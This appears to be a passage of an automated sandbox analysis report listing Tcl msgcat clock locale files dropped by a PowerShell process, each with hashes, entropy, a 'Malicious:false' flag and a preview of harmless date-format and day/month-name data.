                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset es_HN DATE_FORMAT "%m-%d-%Y".. ::msgcat::mcset es_HN TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset es_HN DATE_TIME_FORMAT "%m-%d-%Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):257
                                                                                                                                                                                                                      Entropy (8bit):4.9102355704853435
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:SlSyEtJLl73oo6d3/xoPjbmvFjoH+3v6ry/5oI+3vjb0f6HyFvn:4EnLB383UmdD3v6ry/k3vbSVn
                                                                                                                                                                                                                      MD5:678D7A6DC32355246BF3AC485A24AF4D
                                                                                                                                                                                                                      SHA1:B6C273D3BE5FB9F5A221B0333870CCE41CEDFDE4
                                                                                                                                                                                                                      SHA-256:A0F57137D2C0ABDC933E03CFB188F5632176C195CEADB9DC80D469C8DC6CEDC6
                                                                                                                                                                                                                      SHA-512:571404CCB0591C681C975E3F7A6C6972FAF2362F1D48BFC95E69A9EAE2DB3F40BF4B666C41950C4924E3FD820C61ED91204F92283B8554F1BD35B64D53BD4125
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset es_MX DATE_FORMAT "%e/%m/%Y".. ::msgcat::mcset es_MX TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset es_MX DATE_TIME_FORMAT "%e/%m/%Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):257
                                                                                                                                                                                                                      Entropy (8bit):4.918215906418583
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:SlSyEtJLl73oo6d3/xoe/GriSFjo3W3v6ry/5oe/T+3vrig6HyFvn:4EnLB383Re+2eW3v6ry/RS3v+lSVn
                                                                                                                                                                                                                      MD5:471C41907CE5DB1F30C647A789870F78
                                                                                                                                                                                                                      SHA1:C575A639609620AF7C56430991D0E4C2B50BDEC5
                                                                                                                                                                                                                      SHA-256:6250663DA1378E54BEDCEF206583D212BC0D61D04D070495238D33715BB20CAE
                                                                                                                                                                                                                      SHA-512:CAE32DF8F583542CAFE3292501725D85B697A5C1F9A0A7993490E8A69B6CE5CE3DE3AA2733B14D989A8D13B5E31B437DB42E9AB9D1851FE72313592C752B5061
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset es_NI DATE_FORMAT "%m-%d-%Y".. ::msgcat::mcset es_NI TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset es_NI DATE_TIME_FORMAT "%m-%d-%Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):257
                                                                                                                                                                                                                      Entropy (8bit):4.906719336603863
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:SlSyEtJLl73oo6d3/xoX5rQZ2joHE3v6ry/5oXa+3vrQZg6HyFvn:4EnLB383ak4F3v6ry/G3vkrSVn
                                                                                                                                                                                                                      MD5:571F6716293442672521F70854A5AD05
                                                                                                                                                                                                                      SHA1:525EBDEA6F85FC769B6C0C0B179BD98381647123
                                                                                                                                                                                                                      SHA-256:EBB661C1C09E7D4F6FBCC4B2DAD0F41442B1FFDD27F003ABDC0375DD316E57D7
                                                                                                                                                                                                                      SHA-512:C6176EE48515BDFC09B8347DAC5FD2C0165AA765916457DC7B057E526785AC912481CB72F118D2943372213B23CE3C39739263C2B3DA4DBFEB24C522ACC0439D
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset es_PA DATE_FORMAT "%m/%d/%Y".. ::msgcat::mcset es_PA TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset es_PA DATE_TIME_FORMAT "%m/%d/%Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):257
                                                                                                                                                                                                                      Entropy (8bit):4.90959433688075
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:SlSyEtJLl73oo6d3/xoIgzvFjoQ9X3v6ry/5oI9+3v9f6HyFvn:4EnLB383+zdB3v6ry/y3vMSVn
                                                                                                                                                                                                                      MD5:5A5997D834DDD3E2E8FF8C6956AD54AC
                                                                                                                                                                                                                      SHA1:AB4110E37B3665D738A8F2B3E64CBA9E99127301
                                                                                                                                                                                                                      SHA-256:90C130B66958CF63CB3DDD2C633E58444357DBAB44C56831DD794CBD2EB1AED0
                                                                                                                                                                                                                      SHA-512:1FEB8E77EA7B886E4A06279AC8A4B6200DBB86DCD28989651B92A0C9147A7BCFBB871DF8F904A1CF8F869BFFBD21325505AC44A4DBEBE1EFC87D43174597F1F3
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset es_PE DATE_FORMAT "%d/%m/%Y".. ::msgcat::mcset es_PE TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset es_PE DATE_TIME_FORMAT "%d/%m/%Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):257
                                                                                                                                                                                                                      Entropy (8bit):4.905689521403511
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:SlSyEtJLl73oo6d3/xo06GriSFjoeW3v6ry/5o06T+3vrig6HyFvn:4EnLB383gG+263v6ry/gK3v+lSVn
                                                                                                                                                                                                                      MD5:CE811BB8D12C7E6D53338759CCFB0A22
                                                                                                                                                                                                                      SHA1:0AED290AA479DE6887CCB58D3F0A0F379EF8D558
                                                                                                                                                                                                                      SHA-256:F790E8E48DC079DCD7DEB58170561006A31294F7E4ACBF9CF2ABFA3DB9E3FA9E
                                                                                                                                                                                                                      SHA-512:0C73654CC3D33F76D9BF545BD6C5E42CBDD10B6D9750BFD6536806010F3B6A3C3647FB9D5E7E75A39823FDB857E13D07B7F987809C94B9F980E6D3A6D3108E85
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset es_PR DATE_FORMAT "%m-%d-%Y".. ::msgcat::mcset es_PR TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset es_PR DATE_TIME_FORMAT "%m-%d-%Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):257
                                                                                                                                                                                                                      Entropy (8bit):4.917539255090736
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:SlSyEtJLl73oo6d3/xo/5zvFjovE3v6ry/5o/a+3v9f6HyFvn:4EnLB383Czdt3v6ry/+3vMSVn
                                                                                                                                                                                                                      MD5:9CD6FAC4121E3D287C87157142E32845
                                                                                                                                                                                                                      SHA1:3081FE2197017EC8E052756A407880C1C4ED026A
                                                                                                                                                                                                                      SHA-256:70263F7EB22822DFEE8849B7AC4418ED9331275A71E77236B59226396505CDFF
                                                                                                                                                                                                                      SHA-512:25DC054085C4078734988EEDD87E31ABE93DA8B43512E924DE4BCDE9F8EC670436B72FAD1855484F9AC71DD0BEDD9ED30304D02219C4FFC4B0516D8889BDF9F9
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset es_PY DATE_FORMAT "%d/%m/%Y".. ::msgcat::mcset es_PY TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset es_PY DATE_TIME_FORMAT "%d/%m/%Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):257
                                                                                                                                                                                                                      Entropy (8bit):4.929035824905457
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:SlSyEtJLl73oo6d3/xofriSFjo3+3v6ry/5oY+3vrig6HyFvn:4EnLB383Y+22+3v6ry/Q3v+lSVn
                                                                                                                                                                                                                      MD5:AF300EA6E733DC6820768EA16194B472
                                                                                                                                                                                                                      SHA1:7766A6EB3D07BCC759CF6718EF3D6EC3FCE13565
                                                                                                                                                                                                                      SHA-256:26A38B3745C95673D21BABB987F1D41EE08DDA945C670F5432BA0CE6F893C0E9
                                                                                                                                                                                                                      SHA-512:C38D67C912584BE539D71881C6517AC186CBB336A160602DA716CE2708B2D38CE8FA7DD23EDB98890ABB7119B924B6C7816C18EC18F20C49D6284DF2386E32EE
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset es_SV DATE_FORMAT "%m-%d-%Y".. ::msgcat::mcset es_SV TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset es_SV DATE_TIME_FORMAT "%m-%d-%Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):257
                                                                                                                                                                                                                      Entropy (8bit):4.923802447598272
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:SlSyEtJLl73oo6d3/xooygzvFjooq9X3v6ry/5ooy9+3v9f6HyFvn:4EnLB3835rzdbsX3v6ry/5J3vMSVn
                                                                                                                                                                                                                      MD5:2DC550FEC3F477B1159B824479BCE707
                                                                                                                                                                                                                      SHA1:4D0B20CF3E50B64D74655A405A7750E0B0BB4375
                                                                                                                                                                                                                      SHA-256:1291B58810739EA0651493DD7887F5EE3E14BDB806E06DD4BB8AE2520C742EDA
                                                                                                                                                                                                                      SHA-512:B12B927ACA6274904928A6A6CAEC8339A794C74A1F1804FF93AABC132AF9AD8AC5117F20067A60EFEBC9887150D7ACA5BE9643FF61509666011FD203211C25B9
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset es_UY DATE_FORMAT "%d/%m/%Y".. ::msgcat::mcset es_UY TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset es_UY DATE_TIME_FORMAT "%d/%m/%Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):257
                                                                                                                                                                                                                      Entropy (8bit):4.928484426267027
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:SlSyEtJLl73oo6d3/xoXrzvFjoXK3v6ry/5oXs+3v9f6HyFvn:4EnLB3838zdv3v6ry/c3vMSVn
                                                                                                                                                                                                                      MD5:184D6C4B9F0AA874DEB959F63F7CC01B
                                                                                                                                                                                                                      SHA1:5FB370B498289590C977F6B489FF646F0FB27425
                                                                                                                                                                                                                      SHA-256:91191517403C712299919F9C797F952502E33CB6961D1DBEE3A7C9E8D2B170B9
                                                                                                                                                                                                                      SHA-512:881CCAB0950AE993744ECCA141120C005F53D684167A3E5CBDDF950D110D630FB2B4F6AE6E3D0E06D5110AE25EA00A4F4DAFB03AD3B227DC8C63464D434431DA
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset es_VE DATE_FORMAT "%d/%m/%Y".. ::msgcat::mcset es_VE TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset es_VE DATE_TIME_FORMAT "%d/%m/%Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1258
                                                                                                                                                                                                                      Entropy (8bit):4.391217201307309
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:4aR83P1Y2+1YoQVTsC/m48qpRTVTR7I/68qqq4Z0yoN7emG5wsvtqmsv5t:43P1p+1jQ9sq8y9v8Yko7emG5wKtqmKX
                                                                                                                                                                                                                      MD5:C8C5EF2FA6DD8DBD5BBD2699BE1A0BF6
                                                                                                                                                                                                                      SHA1:F5E26B40786B8987C98F9CBDEF5522043574A9ED
                                                                                                                                                                                                                      SHA-256:4BEE224C21B0483CFF39BE145C671AA20CB7872C8727FD918C0E8ECA2BBEB172
                                                                                                                                                                                                                      SHA-512:757FA85C137A11C1A3F4A8392C7A4E4030A67D0E593FA25A98BEC07DB295399AB2C0D9EBE61E07420B14387A29C060DC3AF812A1E7B85110DBB13C3C3DCB3600
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset et DAYS_OF_WEEK_ABBREV [list \.. "P"\.. "E"\.. "T"\.. "K"\.. "N"\.. "R"\.. "L"].. ::msgcat::mcset et DAYS_OF_WEEK_FULL [list \.. "p\u00fchap\u00e4ev"\.. "esmasp\u00e4ev"\.. "teisip\u00e4ev"\.. "kolmap\u00e4ev"\.. "neljap\u00e4ev"\.. "reede"\.. "laup\u00e4ev"].. ::msgcat::mcset et MONTHS_ABBREV [list \.. "Jaan"\.. "Veebr"\.. "M\u00e4rts"\.. "Apr"\.. "Mai"\.. "Juuni"\.. "Juuli"\.. "Aug"\.. "Sept"\.. "Okt"\.. "Nov"\.. "Dets"\.. ""].. ::msgcat::mcset et MONTHS_FULL [list \.. "Jaanuar"\.. "Veebruar"\.. "M\u00e4rts"\.. "Aprill"\.. "Mai"\.. "Juuni"\.. "Juuli"\.. "August"\.. "September"\.. "Oktoober"\.. "November"\.. "De
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1032
                                                                                                                                                                                                                      Entropy (8bit):4.002617252503668
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:4aR83DEXk8TT7vXk8TTMtzCIsOo/ssP6tvf1I49sHT:434bTbbTc+RjKi4mz
                                                                                                                                                                                                                      MD5:ED9805AF5BFB54EB28C6CB3975F86F5B
                                                                                                                                                                                                                      SHA1:2BD91BD850028712F35A2DDB2555036FBF6E8114
                                                                                                                                                                                                                      SHA-256:6889B57D29B670C6CFB7B5A3F2F1749D12C802E8E9629014D06CE23C034C7EF1
                                                                                                                                                                                                                      SHA-512:16F31DE5D2B0D3ED2D975C7891C73C48F073CDAC28F17572FC9424C2D384DDFE9E5E235F17C788F42840CB2D819D2D9499B909AB80FEF1B09F2AE1627CF1DADC
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset eu DAYS_OF_WEEK_ABBREV [list \.. "igandea"\.. "astelehena"\.. "asteartea"\.. "asteazkena"\.. "osteguna"\.. "ostirala"\.. "larunbata"].. ::msgcat::mcset eu DAYS_OF_WEEK_FULL [list \.. "igandea"\.. "astelehena"\.. "asteartea"\.. "asteazkena"\.. "osteguna"\.. "ostirala"\.. "larunbata"].. ::msgcat::mcset eu MONTHS_ABBREV [list \.. "urt"\.. "ots"\.. "mar"\.. "api"\.. "mai"\.. "eka"\.. "uzt"\.. "abu"\.. "ira"\.. "urr"\.. "aza"\.. "abe"\.. ""].. ::msgcat::mcset eu MONTHS_FULL [list \.. "urtarrila"\.. "otsaila"\.. "martxoa"\.. "apirila"\.. "maiatza"\.. "ekaina"\.. "uztaila"\.. "abuztua"\.. "iraila"\.. "urria"\.. "azaroa"\..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):294
                                                                                                                                                                                                                      Entropy (8bit):4.915392589807169
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:SlSyEtJLl73oo6d3/xoszFnJF+l6VvBoszw3vLjoszw3v6mjosz++3v/RHvn:4EnLB383FL+l6VQ3vO3v6G3vZPn
                                                                                                                                                                                                                      MD5:4C91AA000D4316585893025CBB96E910
                                                                                                                                                                                                                      SHA1:3D4E73839A1A8CB9DEC1E59D9D2813257D9480F0
                                                                                                                                                                                                                      SHA-256:D45CC432E5743E6CEC34E9A1E0F91A9D5C315CDA409E0826B51AD9D908479EB6
                                                                                                                                                                                                                      SHA-512:0731F2EEB22ADC7EF8AF215B9EB4C5A66B33BC90E4F80CF7AA482AD002CB30543547230124A0507EC79EDDD6903A042EDA5D7C8AFD77F7FC994EFC6853FABB05
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset eu_ES DATE_FORMAT "%a, %Yeko %bren %da".. ::msgcat::mcset eu_ES TIME_FORMAT "%T".. ::msgcat::mcset eu_ES TIME_FORMAT_12 "%T".. ::msgcat::mcset eu_ES DATE_TIME_FORMAT "%y-%m-%d %T %z"..}..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1711
                                                                                                                                                                                                                      Entropy (8bit):4.21837106187395
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:4aR83CnMqnbxbGwgjSyiY/Xw2mS1yM/8ye48YyfNqTb2gyj/8yHkQp:43Yzyhgvs9yi4P
                                                                                                                                                                                                                      MD5:7AB25F4E7E457469DC61A33176B3AA72
                                                                                                                                                                                                                      SHA1:EEA98283D250A99E33DD4D5D9B1B76A029716CE6
                                                                                                                                                                                                                      SHA-256:86898728B275288693B200568DC927C3FF5B9050690876C4441A8339DAE06386
                                                                                                                                                                                                                      SHA-512:7524437F91E91751BEB7A378D7674C49E5D84B716FE962F4C23580C46A671F3F33638FCD37A8F90C86E24DA8F54448E06AC9C3AEFFB5613E94A04E512C1AD68D
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset fa DAYS_OF_WEEK_ABBREV [list \.. "\u06cc\u2214"\.. "\u062f\u2214"\.. "\u0633\u2214"\.. "\u0686\u2214"\.. "\u067e\u2214"\.. "\u062c\u2214"\.. "\u0634\u2214"].. ::msgcat::mcset fa DAYS_OF_WEEK_FULL [list \.. "\u06cc\u06cc\u200c\u0634\u0646\u0628\u0647"\.. "\u062f\u0648\u0634\u0646\u0628\u0647"\.. "\u0633\u0647\u200c\u0634\u0646\u0628\u0647"\.. "\u0686\u0647\u0627\u0631\u0634\u0646\u0628\u0647"\.. "\u067e\u0646\u062c\u200c\u0634\u0646\u0628\u0647"\.. "\u062c\u0645\u0639\u0647"\.. "\u0634\u0646\u0628\u0647"].. ::msgcat::mcset fa MONTHS_ABBREV [list \.. "\u0698\u0627\u0646"\.. "\u0641\u0648\u0631"\.. "\u0645\u0627\u0631"\.. "\u0622\u0648\u0631"\.. "\u0645\u0640\u0647"\.. "\u0698\u0648\u0646"\.. "\u0698\u0648\u06cc"\.. "\u0627\u0648\u062a
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2009
                                                                                                                                                                                                                      Entropy (8bit):4.491667766230948
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:4aR83KnMqnbxbGUgjDiY/Xw2mS1yM/8ye48tfNqTb2gyj/8yHkQLoRv9v/vNv0P:43wihgvsai4Rmv53JU
                                                                                                                                                                                                                      MD5:C59EE7CA80AD9F612A21C8B6674A820E
                                                                                                                                                                                                                      SHA1:AEFD631EFC1892063244FA622DE1A091C461E370
                                                                                                                                                                                                                      SHA-256:6B56545C1AE1DE53BC2389BB7AE59F115BADE24F907E384E079491DC77D6541D
                                                                                                                                                                                                                      SHA-512:42F52091480599D317FB80DF8E52A6C6F88614C6172BF4033974DD136FB30E6F47D38982C8A7BC14CF3165C3EBAE3680F94DF3A0ED079AB68165286251CD0BD7
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset fa_IN DAYS_OF_WEEK_ABBREV [list \.. "\u06cc\u2214"\.. "\u062f\u2214"\.. "\u0633\u2214"\.. "\u0686\u2214"\.. "\u067e\u2214"\.. "\u062c\u2214"\.. "\u0634\u2214"].. ::msgcat::mcset fa_IN DAYS_OF_WEEK_FULL [list \.. "\u06cc\u06cc\u200c\u0634\u0646\u0628\u0647"\.. "\u062f\u0648\u0634\u0646\u0628\u0647"\.. "\u0633\u0647\u200c\u0634\u0646\u0628\u0647"\.. "\u0686\u0647\u0627\u0631\u0634\u0646\u0628\u0647"\.. "\u067e\u0646\u062c\u200c\u0634\u0646\u0628\u0647"\.. "\u062c\u0645\u0639\u0647"\.. "\u0634\u0646\u0628\u0647"].. ::msgcat::mcset fa_IN MONTHS_ABBREV [list \.. "\u0698\u0627\u0646"\.. "\u0641\u0648\u0631"\.. "\u0645\u0627\u0631"\.. "\u0622\u0648\u0631"\.. "\u0645\u0640\u0647"\.. "\u0698\u0648\u0646"\.. "\u0698\u0648\u06cc"\.. "\u0627\u0
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):426
                                                                                                                                                                                                                      Entropy (8bit):5.12739029869254
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:4EnLB383D2WGz7A/3vy3v6TANCmK3vz7AAbn:4aR83DoPivkvFk5vPN
                                                                                                                                                                                                                      MD5:9778A7C3ABD37ECBEC0BB9715E52FAF8
                                                                                                                                                                                                                      SHA1:D8063CA7779674EB1D9FE3E4B4774DB20B93038B
                                                                                                                                                                                                                      SHA-256:3D9779C27E8960143D00961F6E82124120FD47B7F3CB82DB3DF21CDD9090C707
                                                                                                                                                                                                                      SHA-512:B90B4A96CE5E8B9BF512B98C406603C60EA00F6740D04CD1FC30810C7155A37851AE5E28716F959137806F1A9E3152D2A0D79B8EA7E681A0737A28593657DE66
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset fa_IR AM "\u0635\u0628\u062d".. ::msgcat::mcset fa_IR PM "\u0639\u0635\u0631".. ::msgcat::mcset fa_IR DATE_FORMAT "%d\u2044%m\u2044%Y".. ::msgcat::mcset fa_IR TIME_FORMAT "%S:%M:%H".. ::msgcat::mcset fa_IR TIME_FORMAT_12 "%S:%M:%l %P".. ::msgcat::mcset fa_IR DATE_TIME_FORMAT "%d\u2044%m\u2044%Y %S:%M:%H %z"..}..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1195
                                                                                                                                                                                                                      Entropy (8bit):4.32217771842326
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:4aR83KTvIhmuw4tW/UWJTttWKeqA+3ewvtyv3e6:43YvIwuw4t05ttnlzt0p
                                                                                                                                                                                                                      MD5:CC06F0ABD8F985654DAD8256598EBCB7
                                                                                                                                                                                                                      SHA1:71C880F9F395ACD32AF7F538033211F392F83645
                                                                                                                                                                                                                      SHA-256:9929A6B7139BD7E0F29487F7888A83E4C4F5E9CE0352738CFCA94EE2DDF3BD6B
                                                                                                                                                                                                                      SHA-512:E1292665270B6FBF7738CC3864B55194E7B827C6AD9492FB2E54DC1B626159B243052CE502335B9D92E2B8F58A4DD1FA0E628CB6A9D1D3A652FE2B93A3FB711A
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset fi DAYS_OF_WEEK_ABBREV [list \.. "su"\.. "ma"\.. "ti"\.. "ke"\.. "to"\.. "pe"\.. "la"].. ::msgcat::mcset fi DAYS_OF_WEEK_FULL [list \.. "sunnuntai"\.. "maanantai"\.. "tiistai"\.. "keskiviikko"\.. "torstai"\.. "perjantai"\.. "lauantai"].. ::msgcat::mcset fi MONTHS_ABBREV [list \.. "tammi"\.. "helmi"\.. "maalis"\.. "huhti"\.. "touko"\.. "kes\u00e4"\.. "hein\u00e4"\.. "elo"\.. "syys"\.. "loka"\.. "marras"\.. "joulu"\.. ""].. ::msgcat::mcset fi MONTHS_FULL [list \.. "tammikuu"\.. "helmikuu"\.. "maaliskuu"\.. "huhtikuu"\.. "toukokuu"\.. "kes\u00e4kuu"\.. "hein\u00e4kuu"\.. "elokuu"\.. "syyskuu"\.. "lokakuu"\.. "marraskuu"\..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1033
                                                                                                                                                                                                                      Entropy (8bit):4.15884265510429
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:4aR834YPxTSBFSa+E6rIsmYmyAxyIQbXHU92W1T:43a6rIyAE0B
                                                                                                                                                                                                                      MD5:5D224E66FD9521CA4327D4F164CD6585
                                                                                                                                                                                                                      SHA1:FC8F4C1D9A69931679028DE02155D96A18F6542E
                                                                                                                                                                                                                      SHA-256:2EC9B03469FA38B260915C93318F446EA5E12B9090BD441936B57552EBA1E3C9
                                                                                                                                                                                                                      SHA-512:0E0F97D99F0274A8A92AA7DC992B252A0BB696D69A8835602D8F4C03A6A15780F45971F00863436949CD81AD7DF6EE6BC463CE5B9FECF5E39508BA4D4E83C693
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset fo DAYS_OF_WEEK_ABBREV [list \.. "sun"\.. "m\u00e1n"\.. "t\u00fds"\.. "mik"\.. "h\u00f3s"\.. "fr\u00ed"\.. "ley"].. ::msgcat::mcset fo DAYS_OF_WEEK_FULL [list \.. "sunnudagur"\.. "m\u00e1nadagur"\.. "t\u00fdsdagur"\.. "mikudagur"\.. "h\u00f3sdagur"\.. "fr\u00edggjadagur"\.. "leygardagur"].. ::msgcat::mcset fo MONTHS_ABBREV [list \.. "jan"\.. "feb"\.. "mar"\.. "apr"\.. "mai"\.. "jun"\.. "jul"\.. "aug"\.. "sep"\.. "okt"\.. "nov"\.. "des"\.. ""].. ::msgcat::mcset fo MONTHS_FULL [list \.. "januar"\.. "februar"\.. "mars"\.. "apr\u00edl"\.. "mai"\.. "juni"\.. "juli"\.. "august"\.. "september"\.. "oktober"\.. "november"\..
